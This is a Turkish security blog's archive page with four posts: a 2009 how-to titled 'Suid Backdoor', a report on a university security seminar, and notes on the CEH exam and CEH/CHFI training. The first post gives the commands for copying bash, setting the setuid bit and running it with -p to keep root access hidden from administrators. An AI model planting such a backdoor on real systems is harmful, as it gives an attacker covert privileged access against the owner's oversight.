Author Archive

Suid Backdoor

Parametresini unutup her bahsi geçildiğinde hatırlamaya çalıştığım ve bulmak için, iki saat nasıldı bu diye deneyip durduğum parametreyi buraya yazayım. Hem lazım olduğunda bulmam kolay olsun. Hemde bilmeyen varsa öğrenmiş olur :-)

Öncelikle root yetkilerine sahip olmuş olmanız gerekiyor. Nasıl root olacağınız bu yazının dışında kalan bir konu. Biz root olduktan sonrası ile ilgileniyoruz :-)

İlk olarak aşağıdaki komutlarla bash kabuğunun bir kopyasını alalım. Ben kendi ev dizinime kopyalamayı tercih ettim. Daha sonra chmod ile suid olarak ayarlayalım.

Kod:
mordor ~ # cp /bin/bash ~harun/backdoor
mordor ~ # chmod +s ~harun/backdoor

Artık  suid arkakapımız hazır. Bundan sonra yapmamız gereken -p parametresi ile ev dizinimize aldığımız suid bash kabuğumuzun kopyasını çalıştırmak olacak…

Kod:
harun@mordor ~ $ whoami
harun
harun@mordor ~ $ ./backdoor -p
harun@mordor ~ # whoami
root

Gençliğimizde, kullanıcı hesabımızın olduğu sistemlerde, sistem yöneticinden saklanıp zaman zaman root olabilmek için kullandığımız eski bir yöntem :-)

Saygılarımla…

2009
09/10
POSTED BY
CATEGORY
Ethical Hacker
Pentest Tools
Write comment

Afyon Kocatepe Üniveristesi Bilgi Güvenliği Semineri

CEH Türkiye ekibi olarak, Afyon Kocatepe Üniversitesi, Ali Çetinkaya yerleşkesinde çok değerli hocalarımız ve öğrenci arkadaşlarımızla “Güvenlik Riskleri ve Saldırı Yöntemleri” konulu etkinlikte buluştuk.

Saat 09:30 itibari ile başladığımız eğitim/seminer arası etkinlikte temel kavramlardan, bilişim güvenliği temellerinden, saldırı ve saldırganlardan, saldırı için kullanılan yöntemlerden teorik ve uygulamalı olarak bahsettik.

Ara Bellek istismarı (Buffer Overflow), Yerel Ağ Saldırıları (Sniffing), Web Saldırıları (Sql Injection , Xss , RFI/LFI , CSRF), Parola Kırmak, Sosyal Mühendislik,Servis Dışı Bırakma Saldırıları (DOS / DDOS ) gibi çeşitli saldırı yöntemlerini uygulamalı olarak gösterdiğimiz 1 günlük eğitim, uzatmalarla birlikte otobüsümüzün hareket saati olan 17:15 sularına gelirken ancak bitirildi ve otobüse ucu ucuna yetişildi.

Biz konuşmacılar olarak, ilgili, meraklı ve sıcakkanlı insanlarla bir arada olmak ve bir şeyler anlatmaktan çok keyif aldığımız için bir günlük eğitim süresi bizim için az bile geldi. Baharda birkaç günlük daha detaylı bir eğitimde buluşmak için sözleşip, etkinlik sırasında bizlere yardımcı olan tüm arkadaş ve dinleyicilerle vedalaştıktan sonra “tekrar görüşmek üzere” diyerek ayrıldık.

Afyonda bizimle ilgilenen Ertuğrul Ergün Hocam başta olmak üzere tüm hocalarımız ve öğrenci arkadaşlarımıza teşekkür ediyoruz.

Seminer sunumuna buradan ulaşabilirsiniz.

Afyon Kocatepe Üniveristesi Bilgi Güvenliği Semineri

2008
11/08
POSTED BY
CATEGORY
Seminer/Konferans
TAGS

4 comments

CEH Sınavı

Ethical Hacking and Countermeasures v6 adı ile geçen CEH sınavı 312-50 veya ECO-350 sınav kodu ile Prometric Prime, Prometric APTC veya VUE sınav merkezlerinden alınabilir.

Sınav süresi 4 saat olup cevaplanması gereken sınav sorusu 150 adettir.  Sınavda başarılı sayılabilmeniz için %70 oranında doğru cevap vermeniz gerekmetedir.

CEH v6 sınavı, eğitim müfredatındaki 67 modülün tamamı ile ilgili tüm konuları kapsayan zor bir sınavdır…

2008
10/31
POSTED BY
CATEGORY
Ethical Hacker
TAGS

Write comment

CEH ve CHFI Eğitimleri

CEH ve CHFI eğitimlerini vermekte olan Ec-Council Türkiye Distribütörü Academytech ‘e CEH ve CHFI eğitimleri hakkında bilgi istediğim bir mesaj göndermiştim. Sağ olsunlar Erdinç Bey CEH ve CHFI Eğitimleri ile ilgili sorularımı yanıtlamış.

CEH ve CHFI eğitimleri hakkında sorduğum soruları ve aldığım cevapları özetleyerek buraya yazayım :)

CEH eğitimi haftada beş gün şeklinde verilmekte ve CEH eğitimine katılabilmemiz için bilgisayar teknolojileri alanında yeterli bilgi düzeyine sahip olmanız beklenmekteymiş. 

Gerek CEH ve gerekse CHFI eğitimlerinde bahsedilecek konuların oldukça ileri seviyede olması nedeniyle bilgi teknolojileri alanında temel eğitimden biraz daha fazlasına sahip olmak gerektiği açıkça ortadadır. Bu konuda diyecek bir şeyimiz yoktur boynumuz kıldan incedir :)

Katılımcılara eğitim sonunda Academytech Eğitime Katılım Sertifikası verilmekteymiş. Bu CEH eğitimi alıp CEH sınavına girmeye cesaret edemeyen arkadaşlar için -evet var öyle arkadaşlar- bir anlamda teselli armağanı veya mansiyon olsa gerek :)

CEH Eğitime katılmanız durumunda, size verilecek olan CEH Eğitim Kiti içerisinde CEH sertifika sınavına katılmanız için 250$ değerindeki sınav katılım kuponu ücretsiz  olarak verilecekmiş. Bu sınav katılım kuponunu istediğiniz zaman kullanabilir ve CEH Sınavına girebilirmişsiniz…

CHFI Eğitimi için ise öncelikle CEH Eğitimi almış ve CEH Eğitimini başarı ile tamamlamış olmanız gerekmekteymiş…

2008
10/29
POSTED BY
CATEGORY
Ethical Hacker
TAGS



7 comments

Recent entry

Archive

Category

 
Hosting Sponsorumuz